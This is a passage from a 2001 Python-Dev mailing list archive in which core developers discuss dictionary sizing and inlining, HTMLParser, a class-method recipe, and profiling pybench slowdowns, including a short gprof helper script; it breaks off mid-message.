Guido is so sympathetic to my lack of sleep lately that I bet he'll let me slip in one uglification without scowling . From mal at lemburg.com Fri May 18 13:36:28 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 13:36:28 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B05093C.8248AE96@lemburg.com> Tim Peters wrote: > > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it. Right, I meant the dict object... (the "not enough coffee" thingie again ;-) > > ... > > I've experimented with the minimal size a lot and found that > > setting it to 8 slots gives the bext performance/memory tradeoff. > > Having done just a couple rounds of instrumented runs across various apps, I > was moving to that conclusion too. Also that "small" dicts are so common > that avoiding the "extra" malloc would be a nice win for them, and that large > dicts are rare enough and resizing expensive enough anyway that the new cost > of doing a two-headed allocation strategy would be lost in the noise. IOW, > I'm inclined to believe that everything you say your patch does is Good For > Python, and Guido is so sympathetic to my lack of sleep lately that I bet > he'll let me slip in one uglification without scowling . I'll see if I find time today to rework the patch for Python CVS. The patch is hiding in my old Python 1.5 killer patch ;-) -- which gives more than a 50% boost on my machine, but that's another story. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 18 13:38:39 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 13:38:39 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B0509BF.A2F84A30@lemburg.com> Tim Peters wrote: > > [Jeremy] > > I also did a profile run on CreateInstances, which has a difference of > > +55.54% on my machine. It's basically the same story. The instance > > dictionary is getting resized more often with Python 2.1+ than it did > > with Python 1.5.2. I wouldn't be surprised if several more tests are > > showing a slowdown with the same cause. > > > > So boosting the minimum size sounds like a good thing. > > I don't know. PyBench is great for showing that *something* changed, but > it's got even less claim to "typical use" than pystone. It doesn't claim "typical use". pybench is aimed at finding out performance issues about hot-spots -- there's no such thing as a "typical program", so pybench gives you low level performance compares for very specific tasks, e.g. dictionary creation or for-loop performance. I have found it to be rather successful at that. At least gives some good hints at where to look... > I don't know that the test suite is better in that respect, but it's got much > more variety and everyone has it . I stuffed code in dict_dealloc() to > record the ma_fill of each dict on its way to the grave (ma_fill == number of > non-virgin slots). Across the test suite, here's the ranking, from most to > least popular fill: > > count fill %total cumulative % > ------ ---- ------ ------------ > 146321 1 53.30 53.30 > 38200 0 13.91 67.21 > 32616 2 11.88 79.09 > 29648 3 10.80 89.89 > 9884 5 3.60 93.49 > 5423 4 1.98 95.47 > 2428 6 0.88 96.35 > 2016 8 0.73 97.08 > 1179 7 0.43 97.51 > 904 9 0.33 97.84 > 709 103 0.26 98.10 > 554 10 0.20 98.30 > 513 13 0.19 98.49 > 459 12 0.17 98.66 > 447 11 0.16 98.82 > 364 14 0.13 98.95 > 233 15 0.08 99.04 > 231 16 0.08 99.12 > 193 18 0.07 99.19 > 180 17 0.07 99.26 > 122 19 0.04 99.30 > 107 30 0.04 99.34 > 105 21 0.04 99.38 > 93 22 0.03 99.41 > 93 20 0.03 99.45 > 86 256 0.03 99.48 > 82 23 0.03 99.51 > 80 26 0.03 99.54 > 74 24 0.03 99.56 > 69 27 0.03 99.59 > 64 25 0.02 99.61 > 60 29 0.02 99.63 > 49 28 0.02 99.65 > 44 34 0.02 99.67 > 33 32 0.01 99.68 > 28 31 0.01 99.69 > 27 37 0.01 99.70 > 27 33 0.01 99.71 > 26 35 0.01 99.72 > 24 36 0.01 99.73 > 23 39 0.01 99.74 > 23 38 0.01 99.75 > 21 128 0.01 99.75 > 19 44 0.01 99.76 > 19 40 0.01 99.77 > 17 46 0.01 99.77 > 16 48 0.01 99.78 > 15 47 0.01 99.78 > 14 50 0.01 99.79 > 14 42 0.01 99.79 > > There are many more sizes, but I cut off the display here when they got too > rare to round to 1% of 1% of the total count. > > Boosting the first non-empty size to 8 would allow 93+% of all dicts to get > away with at most one resize (a dict of size 8 is enough for a fill of 5, but > not 6). OTOH, the current first non-empty size of 4 is enough for 79% of all > dicts (enough for a fill of 2, but not 3). If oodles of those tiny dicts are > alive *at the same time*, it would be quite a waste of space to force the > non-empty ones to carry 8 slots. OTOH, if those small dicts are due to > things like building one- or two-element keyword argument dicts, their > lifetimes rarely overlap. I found that instance dictionaries are usual within the 8 slot range. You normally have a few heavy wheight instances and many light wheight ones which only have two or three attributes in their instance dict. > A more aggressive idea is to allow denser dicts, by allowing them to become > no more than 75% full. That is, change the resize test from > > mp->ma_fill*3 >= mp->ma_size*2 > > to > > mp->ma_fill*4 > mp->ma_size*3 > > That would allow the 10.8% of real(er) life dicts with fill 3 to continue > living in dicts with 4 slots, and allow about 90% of all dicts to get away > with no more than one resize. The downside is that boosting the max load > factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit, > a small boost in the expected # of compares. But the "theory" is for random > hash functions with "uniform probing" (tech term that does *not* mean linear > probing), and Python's hash functions often aren't random at all, while AFAIK > no rigorous analysis of its probing strategy exists. > > So, plenty of arbitrary data there upon which to flip a coin . Why not make those parameters macros at the top of dictobject.c which can then be tuned to whatever the programmer needs/wants ?! -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Fri May 18 17:05:45 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 10:05:45 -0500 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 04:32:39 -0400." References: Message-ID: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it. (I guess he means the buffer is alloc'ed contiguously with the dict object head. That's often a nice strategy. Could do that for small lists too maybe, except those haven't gotten anybody's attention just yet.) > > ... > > I've experimented with the minimal size a lot and found that > > setting it to 8 slots gives the bext performance/memory tradeoff. > > Having done just a couple rounds of instrumented runs across various apps, I > was moving to that conclusion too. Also that "small" dicts are so common > that avoiding the "extra" malloc would be a nice win for them, and that large > dicts are rare enough and resizing expensive enough anyway that the new cost > of doing a two-headed allocation strategy would be lost in the noise. IOW, > I'm inclined to believe that everything you say your patch does is Good For > Python, and Guido is so sympathetic to my lack of sleep lately that I bet > he'll let me slip in one uglification without scowling . Yeah, this one sounds like a nice improvement. --Guido van Rossum (home page: http://www.python.org/~guido/) From thomas at xs4all.net Fri May 18 17:00:21 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Fri, 18 May 2001 17:00:21 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 10:05:45AM -0500 References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> Message-ID: <20010518170021.B16811@xs4all.nl> On Fri, May 18, 2001 at 10:05:45AM -0500, Guido van Rossum wrote: > (I guess he means the buffer is alloc'ed contiguously with the dict > object head. That's often a nice strategy. Could do that for small > lists too maybe, except those haven't gotten anybody's attention just > yet.) Sounds to me like it would benifit tuples even more than lists or dicts. At least in my code, I see more short tuples than short lists, and they are usually not altered after creation ;-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From fdrake at acm.org Fri May 18 17:12:34 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Fri, 18 May 2001 11:12:34 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <20010518170021.B16811@xs4all.nl> References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> Message-ID: <15109.15330.592471.32664@cj42289-a.reston1.va.home.com> Thomas Wouters writes: > Sounds to me like it would benifit tuples even more than lists or dicts. At > least in my code, I see more short tuples than short lists, and they are > usually not altered after creation ;-) The slots of tuples are already allocated inline, so I don't think they'll get much better. ;-) -- Fred L. Drake, Jr. PythonLabs at Digital Creations From guido at digicool.com Fri May 18 17:27:39 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 11:27:39 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 17:00:21 +0200." <20010518170021.B16811@xs4all.nl> References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> Message-ID: <200105181527.KAA19923@cj20424-a.reston1.va.home.com> > > (I guess he means the buffer is alloc'ed contiguously with the dict > > object head. That's often a nice strategy. Could do that for small > > lists too maybe, except those haven't gotten anybody's attention just > > yet.) > > Sounds to me like it would benifit tuples even more than lists or dicts. At > least in my code, I see more short tuples than short lists, and they are > usually not altered after creation ;-) Which is why tuples already have this feature. Posted before your first cup of coffee? :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik at effbot.org Fri May 18 17:36:39 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Fri, 18 May 2001 17:36:39 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1 References: Message-ID: <004401c0dfb0$57b7df00$e46940d5@hagrid> guido wrote: > A much improved HTML parser -- a replacement for sgmllib. The API is > derived from but not quite compatible with that of sgmllib, so it's a > new file. I suppose it needs documentation, and htmllib needs to be > changed to use this instead of sgmllib, and sgmllib needs to be > declared obsolete. any reason this cannot be made compatible with sgmllib? Cheers /F From thomas at xs4all.net Fri May 18 17:36:42 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Fri, 18 May 2001 17:36:42 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 11:27:39AM -0400 References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> <200105181527.KAA19923@cj20424-a.reston1.va.home.com> Message-ID: <20010518173642.S16791@xs4all.nl> On Fri, May 18, 2001 at 11:27:39AM -0400, Guido van Rossum wrote: > > > (I guess he means the buffer is alloc'ed contiguously with the dict > > > object head. That's often a nice strategy. Could do that for small > > > lists too maybe, except those haven't gotten anybody's attention just > > > yet.) > > > > Sounds to me like it would benifit tuples even more than lists or dicts. At > > least in my code, I see more short tuples than short lists, and they are > > usually not altered after creation ;-) > > Which is why tuples already have this feature. > > Posted before your first cup of coffee? :-) No, after my last meeting, before my first witbier of the friday-afternoon-office-beer-binge :) TGIF ;) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From guido at digicool.com Fri May 18 17:49:25 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 11:49:25 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1 In-Reply-To: Your message of "Fri, 18 May 2001 17:36:39 +0200." <004401c0dfb0$57b7df00$e46940d5@hagrid> References: <004401c0dfb0$57b7df00$e46940d5@hagrid> Message-ID: <200105181549.KAA20101@cj20424-a.reston1.va.home.com> > guido wrote: > > A much improved HTML parser -- a replacement for sgmllib. The API is > > derived from but not quite compatible with that of sgmllib, so it's a > > new file. I suppose it needs documentation, and htmllib needs to be > > changed to use this instead of sgmllib, and sgmllib needs to be > > declared obsolete. > > any reason this cannot be made compatible with sgmllib? The sgmllib API design has a few real bogosities. I can't recall what they were, but we looked into keeping it compatible, and it wasn't worth the pain. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Fri May 18 18:57:34 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 12:57:34 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Thu, 17 May 2001 21:45:29 +0200." <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> References: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> Message-ID: <200105181657.LAA20517@cj20424-a.reston1.va.home.com> > According to the CVS log, this implementation of do_cmp was installed > in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific > rationale for doing do_cmp in that order? You can ask me directly, loewis. :-) I believe that my thinking at the time was that tp_compare should only be used as a final fallback, just before comparing by address. This was consistent with my desire to completely get rid of tp_compare. But until that is done, I now agree that it makes more sense to try tp_compare first when a three-way-compare is requested -- especially in the light of sequence comparison. --Guido van Rossum (home page: http://www.python.org/~guido/) From nas at python.ca Fri May 18 19:37:33 2001 From: nas at python.ca (Neil Schemenauer) Date: Fri, 18 May 2001 10:37:33 -0700 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>; from mal@lemburg.com on Fri, May 18, 2001 at 09:26:36AM +0200 References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> Message-ID: <20010518103733.A22185@glacier.fnational.com> M.-A. Lemburg wrote: > FYI, I have a patch which inlines small dictionaries directly > into the type object (rather than usin malloc to allocate > the slot buffer). Would it be faster to inline an association table rather than a hash table? Neil From guido at digicool.com Fri May 18 19:43:45 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 13:43:45 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 10:37:33 PDT." <20010518103733.A22185@glacier.fnational.com> References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> Message-ID: <200105181743.MAA26532@cj20424-a.reston1.va.home.com> > Would it be faster to inline an association table rather than a > hash table? What's an association table? --Guido van Rossum (home page: http://www.python.org/~guido/) From nas at python.ca Fri May 18 20:15:59 2001 From: nas at python.ca (Neil Schemenauer) Date: Fri, 18 May 2001 11:15:59 -0700 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 01:43:45PM -0400 References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com> Message-ID: <20010518111559.A22344@glacier.fnational.com> Guido van Rossum wrote: > What's an association table? A table of keys and values. Values are looked up by looping over the table comparing each key until the correct one is found (ie. its O(n) where n is the size of the table). For Python, the cost of doing compares probably outweighs the cost of doing the hashing, even for small tables. Its not clear to me though if it would be a win. Assuming that interned strings are the most common key, a assocation table with four entries would take on average two pointer compares to look up a value. Neil From mal at lemburg.com Fri May 18 20:15:37 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 20:15:37 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B0566C9.90F17DB1@lemburg.com> Tim Peters wrote: > > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it. There you go: https://sourceforge.net/tracker/?func=detail&aid=425242&group_id=5470&atid=305470 -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Fri May 18 20:23:55 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 14:23:55 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 11:15:59 PDT." <20010518111559.A22344@glacier.fnational.com> References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com> <20010518111559.A22344@glacier.fnational.com> Message-ID: <200105181823.NAA32234@cj20424-a.reston1.va.home.com> > Guido van Rossum wrote: > > What's an association table? > > A table of keys and values. Values are looked up by looping over > the table comparing each key until the correct one is found (ie. > its O(n) where n is the size of the table). For Python, the cost > of doing compares probably outweighs the cost of doing the > hashing, even for small tables. > > Its not clear to me though if it would be a win. Assuming that > interned strings are the most common key, a assocation table with > four entries would take on average two pointer compares to look > up a value. > > Neil I see. At the cost of yet another algorithm, of course. --Guido van Rossum (home page: http://www.python.org/~guido/) From James_Althoff at i2.com Fri May 18 21:10:11 2001 From: James_Althoff at i2.com (James_Althoff at i2.com) Date: Fri, 18 May 2001 12:10:11 -0700 Subject: [Python-Dev] Re: Simulating Class (was Re: Does Python have Class methods) Message-ID: Python-dev'ers, Pardon the intrusion, but Aahz Maruch suggested that I post this to the python-dev list. The message below illustrates "yet another class method recipe" that Costas synthesized (and which I then modified very slightly) from various posts following another discussion on python-list about class methods (as we all await the "type/class healing" stuff some of you are working on -- go team!). This variant uses explicit "metaclasses" (defined as regular classes) whose instances ("meta objects") point to class objects (since they cannot *be* class objects in current Python). Anyway, I think the approach has some nice properties. Best regards, Jim ----- Forwarded by James Althoff/AMER/i2Tech on 05/18/01 11:23 AM ----- James Althoff To: python-list at python.org 05/14/01 02:09 cc: PM Subject: Re: Simulating Class (was Re: Does Python have Class methods)(Document link: James Althoff) Costas writes: >Ok, so after looking thru how Python works and comments from people, I >came up with what I believe may be the best way to implement Class >methods and Class variables. > > > >Costas I think this idea is quite good. I would amend it very slightly by suggesting the convention of defining *three* separate names in the enclosing module: 1) the name of the enclosing class 2) the name of the singleton instance of the enclosing class 3) the name of the enclosed class To support this, I would propose using a naming convention as below. If one is interested in defining a class Spam, then use the following names: 1) SpamMetaClass -- names the enclosing class 2) SpamMeta -- names a singleton instance of the enclosing class 3) Spam -- names the enclosed class Use the name SpamMetaClass when you need to derive a subclass of SpamMetaClass, e.g., class SpecialSpamMetaClass(SpamMetaClass): pass Use the name SpamMeta to invoke a class method, e.g., SpamMeta.aClassMethod() Use the name Spam to make instances as usual, e.g., s = Spam() (and to derive a subclass of Spam). Although SpamMetaClass is not a metaclass in the sense of Smalltalk or Ruby -- that is to say, the class Spam is not an instance of SpamMetaClass -- nonetheless, SpamMetaClass still acts as a "higher level" class that provides methods on behalf of the class Spam where said methods are 1) independent of any particular instance of Spam and 2) allow for factory-method-style creation of Spam instances -- these being two very important attributes of the metaclass concept. Plus "meta" is a nice, short name. :-) Plus using "MetaClass" to refer to the class and "Meta" to refer to the singleton instance of "MetaClass" is reasonably clear and succinct, I think. One nice thing about the proposed recipe is that the SpamMeta object is a real class instance of a real class. This means that -- unlike when using the "module function" recipe -- we get inheritance of methods, and -- unlike when using the "callable wrapper class" recipe -- we also get override of methods. The example below illustrates both of these important capabilities. class Class1MetaClass: # Base metaclass # Define "class methods" for Class1 def whoami(self): print 'Class1MetaClass.whoami:', self def new(self): # Factory method """Return a new instance""" return self.Class1() def newList(self,n=3): # Another factory method """Return a list of new instances""" l = [] for i in range(n): newInstance = self.new() l.append(newInstance) return l # Define Class1 & its "instance methods" class Class1: # Base class def whoami(self): print 'Class1.whoami:', self Class1Meta = Class1MetaClass() # Make & name the singleton metaclass instance Class1 = Class1Meta.Class1 # Make the Class1 name accessible class Class2MetaClass(Class1MetaClass): # Derived metaclass # Define "class methods" for Class2 -- Override Class1 "class methods" def whoami(self): print 'Class2MetaClass.whoami:', self def new(self): # Override the factory method return self.Class2() # Define Class2 & its "instance methods" class Class2(Class1): # Derived class def whoami(self): print 'Class2.whoami:', self Class2Meta = Class2MetaClass() # Make & name the singleton metaclass instance Class2 = Class2Meta.Class2 # Make the Class2 name accessible # Test Class1Meta.whoami() # invoke "class method" of base class Class2Meta.whoami() # invoke "class method" of derived class Class1().whoami() # make an instance & invoke "instance method" Class2().whoami() print Class1Meta.newList() # factory method print Class2Meta.newList() # inherit factory method with override >>> reload(meta6) Class1MetaClass.whoami: Class2MetaClass.whoami: Class1.whoami: Class2.whoami: [, , ] [, , ] Jim From tim.one at home.com Fri May 18 21:26:02 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 18 May 2001 15:26:02 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B0509BF.A2F84A30@lemburg.com> Message-ID: [MAL] > It [pybench] doesn't claim "typical use". pybench is aimed at finding > out performance issues about hot-spots -- there's no such thing as > a "typical program", so pybench gives you low level performance > compares for very specific tasks, e.g. dictionary creation or > for-loop performance. > > I have found it to be rather successful at that. At least gives > some good hints at where to look... There must be a misunderstanding here. I understand and appreciate all that! From tim.one at home.com Fri May 18 21:48:33 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 18 May 2001 15:48:33 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <20010518111559.A22344@glacier.fnational.com> Message-ID: [Neil Schemenauer] > A table of keys and values. Values are looked up by looping over > the table comparing each key until the correct one is found (ie. > its O(n) where n is the size of the table). For Python, the cost > of doing compares probably outweighs the cost of doing the > hashing, even for small tables. I thought about that before. The inlining appeals but the algorithm not much: the dict implementation *as is* loops over all the table entries too, except that instead of starting with "i = 0" it starts (now) with "i = hash & mask"; instead of incrementing via "++i" it does "i <<= 1; if (i > mask) i ^= poly"; and instead of giving up when "i >= length" it punts when finding an entry with a null value. Incrementing via ++i is certainly cheaper, except that even when small, the hash table usually hits on the first try when the key is present, so usually gets out before incrementing. > Its not clear to me though if it would be a win. Best guess is not. > Assuming that interned strings are the most common key, a assocation > table with four entries would take on average two pointer compares > to look up a value. Actually an average of 2.5 when the key is present and each key is equally likely to be queried, and always 4 when the queried key is not present. The hash table has better expected stats on both counts, but needs 4 unused slots too to achieve that. The savings would be in memory for small dicts more than in time (if at all). From jeremy at alum.mit.edu Fri May 18 23:07:37 2001 From: jeremy at alum.mit.edu (Jeremy Hylton) Date: Fri, 18 May 2001 17:07:37 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns Message-ID: <200105182107.RAA16214@cliff.concentric.net> I did some profiles of more of the pybench slowdowns this afternoon and found a few causes for several problem benchmarks. I just made a couple of small changes for BuiltinFunctionCalls. The problem here is that PyCFunction calls were optimized for flags == 0 and not flags == METH_VARARGS, which is more common. The scary thing about BuiltinFunctinoCalls is that the profiler shows it spending almost 30% of its time in PyArg_ParseTuple(). It certainly is a shame that we have this complicated, slow run-time parsing mechanism to deal with a static property of the code, namely how many arguments it takes and whether their types are. A few of the other tests, SimpleComplexArithmetic and CreateStringsWithConcat, are slower because of the new coercion logic. I didn't spend much time on SimpleComplexArithmetic, but I did look at CreateStringsWithConcat in some detail. The basic problem is that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls PyNumber_Add("ab", "cd"). This function tries all sorts of different ways to coerce the strings into addable numbers before giving up and trying sequence concat. It looks like the new coercion rules have optimized number ops at the expense of string ops. If you're writing programs with lots of numbers, you probably think that's peachy. If you're parsing HTML, perhaps you don't :-). I looked at the test suite to see how often it is called with non-number arguments. The answer is 77% of the time, but almost all of those calls are from test_unicodedata. If that one test is excluded, the majority of the calls (~90%) are with numbers. But the majority of those calls just come from a few tests -- test_pow, test_long, test_mutants, test_strftime. If I were to do something about the coercions, I would see if there was a way to quickly determine that PyNumber_Add() ain't gonna have any luck. Then we could bail to things like string_concat more quickly. I also looked at SmallLists. It seems that the only significant change since 1.5.2 is the garbage collection. This tests spends a lot more time deallocating lists than it used to, and the only change I see in the code is the GC. I assume, but haven't checked, that the story is similar for SmallTuples. So the primary things that have slowed down since 1.5.2 seem to be: comparisons, coercion, and memory management for containers. These also seem to be the things that have improved the most in terms of features, completeness, etc. Looks like we need to revisit them and sort out the performance issues. Jeremy From guido at digicool.com Fri May 18 23:58:25 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 17:58:25 -0400 Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: Your message of "Fri, 18 May 2001 17:07:37 EDT." <200105182107.RAA16214@cliff.concentric.net> References: <200105182107.RAA16214@cliff.concentric.net> Message-ID: <200105182158.QAA01250@cj20424-a.reston1.va.home.com> > The scary thing about BuiltinFunctinoCalls is that the profiler shows > it spending almost 30% of its time in PyArg_ParseTuple(). It > certainly is a shame that we have this complicated, slow run-time > parsing mechanism to deal with a static property of the code, namely > how many arguments it takes and whether their types are. I would love to see a mechanism whereby the signature of a C function could be stored as part of the static info about it, in an extension of the PyMethodDef structure: this would serve as documentation, allow for introspection, etc. I'm sure Ping would love this for pydoc and his inspect module. But I'm not sure how much we can speed things up, unless we give up on the tuple interface (an argc/argv API could be much faster since usually the arguments are already on the frame's stack in this form). > A few of the other tests, SimpleComplexArithmetic and > CreateStringsWithConcat, are slower because of the new coercion > logic. I didn't spend much time on SimpleComplexArithmetic, but I did > look at CreateStringsWithConcat in some detail. The basic problem is > that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls > PyNumber_Add("ab", "cd"). This function tries all sorts of different > ways to coerce the strings into addable numbers before giving up and > trying sequence concat. > > It looks like the new coercion rules have optimized number ops at the > expense of string ops. If you're writing programs with lots of > numbers, you probably think that's peachy. If you're parsing HTML, > perhaps you don't :-). > > I looked at the test suite to see how often it is called with > non-number arguments. The answer is 77% of the time, but almost all > of those calls are from test_unicodedata. If that one test is > excluded, the majority of the calls (~90%) are with numbers. But the > majority of those calls just come from a few tests -- test_pow, > test_long, test_mutants, test_strftime. > > If I were to do something about the coercions, I would see if there > was a way to quickly determine that PyNumber_Add() ain't gonna have > any luck. Then we could bail to things like string_concat more > quickly. There's already a special case for int+int in the BINARY_ADD opcode (otherwise you would probably see more numbers). Maybe another special case for str+str would help here? > I also looked at SmallLists. It seems that the only significant > change since 1.5.2 is the garbage collection. This tests spends a lot > more time deallocating lists than it used to, and the only change I > see in the code is the GC. I assume, but haven't checked, that the > story is similar for SmallTuples. > > So the primary things that have slowed down since 1.5.2 seem to be: > comparisons, coercion, and memory management for containers. These > also seem to be the things that have improved the most in terms of > features, completeness, etc. Looks like we need to revisit them and > sort out the performance issues. Thanks for doing all this work, Jeremy! I just hope that these performance hacks won't have to be redone when I'm done with healing the types/class split. I'm expecting that things can become a lot simpler if everything inherits from Object, sequences inherit from Sequence, and so on. But since I'm currently going slow on this work, I won't complain too much if the existing code gets optimized first. The stuff you already checked in looks good! --Guido van Rossum (home page: http://www.python.org/~guido/) From jeremy at digicool.com Sat May 19 00:06:05 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Fri, 18 May 2001 18:06:05 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182158.QAA01250@cj20424-a.reston1.va.home.com> References: <200105182107.RAA16214@cliff.concentric.net> <200105182158.QAA01250@cj20424-a.reston1.va.home.com> Message-ID: <15109.40141.757071.770265@slothrop.digicool.com> In case anyone else is interested, here are two quick pointers on running pybench tests under the profiler. 1. To build Python with profiling hooks (Unix only): LDFLAGS="-pg" OPT="-pg" configure make When you run python it produces a gmon.out file. To run gprof, pass it the profile-enable executable and gmon.out. It's spit out the results on stdout. 2. Use this handy script (below) to run a single pybench test under the profiler and produce the output. Jeremy """Tool to automate profiling of individual pybench benchmarks""" import os import re import tempfile PYCVS = "/home/jeremy/src/python/dist/src/build-pg/python" PY152 = "/home/jeremy/src/python/dist/Python-1.5.2/build-pg/python" rx_grep = re.compile('^([^:]+):(.*)') rx_decl = re.compile('class (\w+)\(\w+\):') def find_bench(name): p = os.popen("grep %s *.py" % name) for line in p.readlines(): mo = rx_grep.search(line) if mo is None: continue file, text = mo.group(1, 2) mo = rx_decl.search(text) if mo is None: continue klass = mo.group(1) return file, klass return None, None def write_profile_code(file, klass, path): i = file.find(".") file = file[:i] f = open(path, 'w') print >> f, "import %s" % file print >> f, "%s.%s().run()" % (file, klass) f.close() def profile(interp, path, result): if os.path.exists("gmon.out"): os.unlink("gmon.out") os.system("PYTHONPATH=. %s %s" % (interp, path)) if not os.path.exists("gmon.out"): raise RuntimeError, "gmon.out not generated by %s" % interp os.system("gprof %s gmon.out > %s" % (interp, result)) def main(bench_name): file, klass = find_bench(bench_name) if file is None: raise ValueError, "could not find class %s" % bench_name code_path = tempfile.mktemp() write_profile_code(file, klass, code_path) profile(PYCVS, code_path, "%s.cvs.prof" % bench_name) profile(PY152, code_path, "%s.152.prof" % bench_name) os.unlink(code_path) if __name__ == "__main__": import sys main(sys.argv[1]) From jim at interet.com Sat May 19 18:45:15 2001 From: jim at interet.com (James C. Ahlstrom) Date: Sat, 19 May 2001 12:45:15 -0400 Subject: [Python-Dev] [off topic] Python is taking over the world Message-ID: <3B06A31B.67A8D010@interet.com> I was in my local (Sommerville, NJ) Borders book store last week and noticed that they stocked many Python books, most in multiple copies. It all added up to three feet of Python books. Great. The clincher was when I went to my YMCA, and saw that someone had posted a flyer offering tutoring in Math, Physics, Java and Python. Congratulations to Guido and all on this list. JimA From guido at digicool.com Sun May 20 01:18:25 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 19 May 2001 19:18:25 -0400 Subject: [Python-Dev] Off-topic: So long, and thanks for all the fish Message-ID: <200105192318.TAA02405@cj20424-a.reston1.va.home.com> For all you Douglas Adams fans out there: Douglas Noel Adams 1952 - 2001 http://www.douglasadams.com --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Sun May 20 11:31:25 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 05:31:25 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> Message-ID: [M0artin v. Loewis] > ... > If I set 